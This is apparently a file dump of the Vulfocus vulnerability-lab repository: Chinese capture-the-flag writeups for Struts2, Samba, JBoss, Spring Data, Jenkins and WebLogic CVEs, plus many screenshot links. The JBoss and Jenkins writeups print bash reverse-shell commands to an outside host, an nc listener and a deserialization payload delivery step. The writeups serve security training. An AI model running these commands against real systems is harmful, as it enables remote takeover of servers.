/writeup/CVE-2017-3066/20200516152446.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-3066/20200516152446.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-3066/20200516152827.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-3066/20200516152827.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-3066/20200516152929.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-3066/20200516152929.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-3066/20200516154357.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-3066/20200516154357.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-3066/20200516164230.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-3066/20200516164230.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-5638/20200513171818.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-5638/20200513171818.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-5638/20200513171852.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-5638/20200513171852.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-5638/CVE-2017-5638.md:
--------------------------------------------------------------------------------
1 | # st2-046远程命令执行(CVE-2017-5638)by [anonymity3712](https://github.com/anonymity3712)
2 |
3 | ## 漏洞描述
4 |
5 | CVE-2017-5638即st2-045/st2-046漏洞,影响范围Struts 2.3.5-2.3.31,Struts 2.5-2.5.10
6 |
7 | ## writeup
8 |
9 | 启动靶场环境
10 |
11 | 
12 |
13 | 直接使用工具去打
14 |
15 | 
--------------------------------------------------------------------------------
/writeup/CVE-2017-7494/20200509100348.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-7494/20200509100348.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-7494/20200509100645.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-7494/20200509100645.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-7494/20200509101114.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-7494/20200509101114.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-7494/CVE-2017-7494.md:
--------------------------------------------------------------------------------
1 | # Samba 远程命令执行(CVE-2017-7494)by [anonymity3712](https://github.com/anonymity3712)
2 |
3 | ## 漏洞描述
4 |
5 | Samba 允许连接一个远程的命名管道,并且在连接前会调用 `is_known_pipename()` 函数验证管道名称是否合法。Samba 远程命令执行漏洞形成的原因:在 `is_known_pipename()` 函数中,并没有检查管道名称中的特殊字符,加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码。
6 |
7 | ## writeup
8 |
9 | 
10 |
11 | 直接利用msf里的模块
12 |
13 | `search cve-2017-7494`
14 |
15 | 
16 |
17 | msf一把梭
18 |
19 | 
20 |
21 | 获取到flag
--------------------------------------------------------------------------------
/writeup/CVE-2017-7504/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-7504/1.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-7504/CVE-2017-7504.md:
--------------------------------------------------------------------------------
1 | # JBoss 命令执行漏洞(CVE-2017-7504)by [Vdeem](https://github.com/Vdeem)
2 |
3 | ## 一、漏洞描述
4 |
5 | Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
6 |
7 | ## 二、影响版本
8 |
9 | Red Hat JBoss Application Server <=4.x
10 |
11 | ## 三、利用流程
12 |
13 | 1 对应镜像名称为:vulfocus/jboss-cve_2017_7504
14 |
15 | 2 利用工具地址:https://github.com/joaomatosf/JavaDeserH2HC
16 |
17 | 3 编译并生成序列化数据
18 |
19 | ```bash
20 | javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
21 | ```
22 |
23 | 4 设置反弹ip与端口
24 |
25 | ```
26 | java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/1.1.1.1/1234 0>&1"
27 | ```
28 |
29 | 5 服务器监听
30 |
31 | ```
32 | nc -lvp 1234
33 | ```
34 |
35 | 6 发送数据包
36 |
37 | ```
38 | curl http://127.0.0.1:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser
39 | ```
40 |
41 | 7 可成功反弹shell
42 |
--------------------------------------------------------------------------------
/writeup/CVE-2017-8046/CVE-2017-8046.md:
--------------------------------------------------------------------------------
1 | # Spring Data REST PATCH 请求代码执行漏洞(CVE-2017-8046)by [fengyehack](https://github.com/fengyehack)
2 |
3 | ## 一、漏洞描述
4 |
5 | Spring Data REST是Spring Data项目的一部分,可以轻松地在Spring Data存储库之上构建超媒体驱动的REST Web服务。
6 |
7 | 恶意的PATCH请求使用精心构造的JSON数据提交到spring-data-rest服务可以执行任意JAVA代码
8 |
9 | ## 二、漏洞影响范围
10 |
11 | Spring Data REST versions prior to 2.5.12, 2.6.7, 3.0 RC3
12 |
13 | 可以查看spring-data-rest-webmvc jar包的版本
14 |
15 | ## 三、漏洞复现
16 |
17 | 启动Vulfocus靶场
18 |
19 | 
20 |
21 | 访问
22 |
23 | 
24 |
25 |
26 |
27 | 先利用 POST 请求添加一个数据
28 |
29 | Content-Type: application/json
30 |
31 | {"firstName": "Vulfocus", "lastName": "Vulfocus"}
32 |
33 | 
34 |
35 |
36 | PATCH请求
37 |
38 | Content-Type: application/json-patch+json
39 |
40 | 利用代码执行漏洞 反弹shell
41 |
42 | 
43 |
44 |
45 |
46 | 
47 |
48 | 成功
49 |
50 | 
51 |
52 |
53 | 获取flag
54 |
55 | 
--------------------------------------------------------------------------------
/writeup/CVE-2017-8046/image-20200614163341.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-8046/image-20200614163341.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-8046/image-20200614165319492.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-8046/image-20200614165319492.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-8046/image-20200614174222206.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-8046/image-20200614174222206.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-8046/image-20200614184235237.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-8046/image-20200614184235237.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-8046/image-20200614184505493.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-8046/image-20200614184505493.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-8046/image-20200710181712.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-8046/image-20200710181712.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-8046/image-20200710181758.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-8046/image-20200710181758.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-9791/20200513142620.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-9791/20200513142620.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-9791/20200513142803.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-9791/20200513142803.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-9791/20200513143114.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-9791/20200513143114.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-9791/20200513143922.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-9791/20200513143922.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-9791/20200513144117.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-9791/20200513144117.png
--------------------------------------------------------------------------------
/writeup/CVE-2017-9791/20200513144307.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2017-9791/20200513144307.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1000861/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1000861/1.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1000861/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1000861/2.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1000861/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1000861/3.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1000861/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1000861/4.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1000861/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1000861/5.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1000861/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1000861/6.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1000861/CVE-2018-1000861.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-1000861(Jekins 远程命令执行)by [Frivolous-scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 漏洞概述
4 |
5 | Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
6 |
7 | 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。
8 |
9 | 首先打开靶场。
10 |
11 | 
12 |
13 | 因为此漏洞无回显,所以直接用脚本反弹 shell 了,附上下载链接:
14 |
15 | `https://github.com/orangetw/awesome-jenkins-rce-2019/`
16 |
17 | 首先在跳板机上面创建一个 TXT 文档,文档内容为:
18 |
19 | `bash -i >& /dev/tcp/IP/port 0>&1`
20 |
21 | 然后在跳板机上面创建一个 HTTP 服务,命令如下:
22 |
23 | `python3 -m http.server`
24 |
25 | 然后利用脚本去下载 跳板机上面 shell 文档
26 |
27 | 
28 |
29 | 在你的跳板机上开启监听,端口是刚才 shell 文档里写的端口
30 |
31 | 
32 |
33 | 然后执行 shell 文档
34 |
35 | 
36 |
37 | 成功反弹,并执行 ls /tmp 查看 Flag
38 |
39 | 
40 |
41 | 也可以利用 Goby 直接去利用
42 |
43 | 
44 |
45 |
--------------------------------------------------------------------------------
/writeup/CVE-2018-11776/20200509092307.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-11776/20200509092307.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-11776/20200509092438.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-11776/20200509092438.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-11776/20200509092636.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-11776/20200509092636.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1273/CVE-2018-1273.md:
--------------------------------------------------------------------------------
1 | # Spring Data Commons 代码执行漏洞(CVE-2018-1273)by [fengyehack](https://github.com/fengyehack)
2 |
3 | ## 一、漏洞描述
4 |
5 | Spring Data是Spring框架中提供底层数据访问的项目模块,Spring Data Commons是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通 过构造特殊的URL请求,造成服务端远程代码执行。
6 |
7 |
8 |
9 | ## 二、漏洞影响版本
10 |
11 | Spring Data Commons 1.13 - 1.13.10(Ingalls SR10)
12 |
13 | Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
14 |
15 | Spring Data Commons 2.0 - 2.0.5 (Kay SR5)
16 |
17 | Spring Data REST 3.0 - 3.0.5 (Kay SR5)
18 |
19 | 已不支持的旧版本
20 |
21 |
22 |
23 | ## 三、漏洞复现
24 |
25 | 启动Vulfocus
26 |
27 | 
28 |
29 | 访问/users
30 |
31 | 
32 |
33 | 填写信息 点击Register user 然后抓包
34 |
35 | 利用存在的代码执行漏洞反弹shell:
36 |
37 | 下载nc命令脚本
38 | 
39 |
40 |
41 | 再执行该脚本
42 | 
43 |
44 | 反弹成功
45 |
46 | 
47 |
48 | 获取flag
49 |
50 | 
51 |
52 |
--------------------------------------------------------------------------------
/writeup/CVE-2018-1273/image-20200614190741458.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1273/image-20200614190741458.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1273/image-20200614191635397.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1273/image-20200614191635397.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1273/image-20200614200135920.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1273/image-20200614200135920.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1273/image-20200614200341186.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1273/image-20200614200341186.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1273/image-20200614200415902.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1273/image-20200614200415902.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-1273/image-20200614200816753.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-1273/image-20200614200816753.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-2894/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-2894/1.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-2894/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-2894/2.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-2894/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-2894/3.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-2894/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-2894/4.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-2894/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-2894/5.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-2894/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-2894/6.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-2894/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-2894/7.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-7600/20200508161436.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-7600/20200508161436.png
--------------------------------------------------------------------------------
/writeup/CVE-2018-7600/20200509093232.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2018-7600/20200509093232.png
--------------------------------------------------------------------------------
/writeup/CVE-2020-1956/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2020-1956/1.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2020-1956/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2020-1956/2.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2020-1956/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2020-1956/3.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2020-1956/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2020-1956/4.jpg
--------------------------------------------------------------------------------
/writeup/CVE-2020-2555/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2020-2555/1.png
--------------------------------------------------------------------------------
/writeup/CVE-2020-2555/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2020-2555/2.png
--------------------------------------------------------------------------------
/writeup/CVE-2020-2555/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/CVE-2020-2555/3.png
--------------------------------------------------------------------------------
/writeup/CVE-2020-2555/CVE-2020-2555.md:
--------------------------------------------------------------------------------
1 | # Weblogic 命令执行漏洞(CVE-2020-2555)by [xiajibaxie](https://github.com/xiajibaxie)
2 |
3 | ## 一、漏洞描述
4 |
5 | 该漏洞允许未经身份验证的攻击者通过构造 T3 网络协议请求进行攻击,成功利用该漏洞可实现在目标主机上执行任意代码。
6 |
7 | ## 二、影响版本
8 |
9 | ```
10 | Oracle Coherence 3.7.1.17
11 | Oracle Coherence & Weblogic 12.1.3.0.0
12 | Oracle Coherence & Weblogic 12.2.1.3.0
13 | Oracle Coherence & Weblogic 12.2.1.4.0
14 | ```
15 |
16 | ## 三、利用流程
17 |
18 | 访问地址: `10.10.11.20:46417`
19 |
20 | 名称: CVE-2020-2555
21 |
22 | 使用goby扫描发现漏洞
23 |
24 | 
25 |
26 | 反弹shell成功
27 |
28 | 
29 |
30 | 执行命令获得flag
31 |
32 | 
33 |
34 | 通关!
35 |
36 | ## 四、修复方案
37 |
38 | 1. 临时解决方案:禁用 weblogic T3 协议。
39 | 2. 安装 Oracle 更新补丁,需要登录帐户后下载。
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/1.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/10.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/11.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/2.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/3.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/4.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/5.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/6.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/7.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/8.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.24反序列化导致任意命令执行漏洞_fengyehack/9.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/1.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/10.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/2.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/3.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/4.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/5.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/6.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/7.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/8.png
--------------------------------------------------------------------------------
/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/9.png:
--------------------------------------------------------------------------------
